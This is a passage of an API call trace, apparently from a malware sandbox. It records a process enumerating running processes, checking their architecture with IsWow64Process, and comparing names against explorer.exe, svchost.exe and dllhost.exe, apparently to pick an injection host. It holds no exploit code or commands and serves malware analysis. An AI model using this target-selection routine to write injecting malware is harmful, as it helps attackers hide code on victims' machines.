(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0203.565] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0203.565] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0203.566] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0203.566] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0203.567] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0203.567] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0203.568] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0203.568] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0203.569] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0203.569] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.569] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.569] CloseHandle (hObject=0xec) returned 1 [0203.569] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0203.570] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0203.570] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.570] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.570] CloseHandle (hObject=0xec) returned 1 [0203.570] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0203.571] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0203.571] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0203.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0203.572] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.572] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.572] CloseHandle (hObject=0xec) returned 1 [0203.572] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0203.572] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0203.572] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0203.572] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0203.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0203.573] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.573] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.573] CloseHandle (hObject=0xec) returned 1 [0203.573] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0203.573] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0203.573] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0203.573] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0203.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0203.573] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.573] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.574] CloseHandle (hObject=0xec) returned 1 [0203.574] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0203.574] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0203.574] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0203.574] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0203.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0203.574] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.574] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.574] CloseHandle (hObject=0xec) returned 1 [0203.574] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0203.574] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0203.574] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0203.574] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0203.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0203.575] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.575] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.575] CloseHandle (hObject=0xec) returned 1 [0203.575] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0203.575] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0203.575] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0203.575] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0203.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0203.576] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.576] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.576] CloseHandle (hObject=0xec) returned 1 [0203.576] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0203.576] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0203.576] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0203.576] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0203.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0203.576] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.576] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.576] CloseHandle (hObject=0xec) returned 1 [0203.576] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0203.576] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0203.576] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0203.576] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0203.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0203.577] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.577] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.577] CloseHandle (hObject=0xec) returned 1 [0203.577] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0203.577] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0203.577] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0203.577] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0203.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0203.578] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.578] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.578] CloseHandle (hObject=0xec) returned 1 [0203.578] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0203.578] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0203.578] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0203.578] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0203.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0203.578] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.578] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.578] CloseHandle (hObject=0xec) returned 1 [0203.578] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0203.578] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0203.578] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0203.579] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0203.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0203.579] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.579] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.579] CloseHandle (hObject=0xec) returned 1 [0203.579] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0203.579] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0203.579] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0203.579] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0203.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0203.580] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.580] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.580] CloseHandle (hObject=0xec) returned 1 [0203.580] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0203.580] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0203.580] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0203.580] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0203.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0203.580] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.581] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.581] CloseHandle (hObject=0xec) returned 1 [0203.581] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0203.581] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0203.581] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0203.581] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0203.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0203.581] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.581] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.581] CloseHandle (hObject=0xec) returned 1 [0203.581] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0203.581] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0203.581] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0203.581] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0203.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0203.582] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.582] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.582] CloseHandle (hObject=0xec) returned 1 [0203.582] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0203.582] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0203.582] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0203.582] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0203.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0203.583] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.583] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.583] CloseHandle (hObject=0xec) returned 1 [0203.583] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0203.583] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0203.583] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0203.583] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0203.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0203.583] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.583] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.583] CloseHandle (hObject=0xec) returned 1 [0203.583] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0203.583] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0203.583] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0203.583] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0203.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0203.584] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.584] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.584] CloseHandle (hObject=0xec) returned 1 [0203.584] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0203.584] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0203.584] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0203.584] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0203.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0203.585] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.585] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.585] CloseHandle (hObject=0xec) returned 1 [0203.585] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0203.585] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0203.585] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0203.585] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0203.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0203.585] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.585] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.585] CloseHandle (hObject=0xec) returned 1 [0203.585] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0203.585] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0203.585] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0203.586] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0203.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0203.586] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.586] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0203.586] CloseHandle (hObject=0xec) returned 1 [0203.586] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0203.586] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0203.586] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0203.586] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0203.587] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0203.587] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 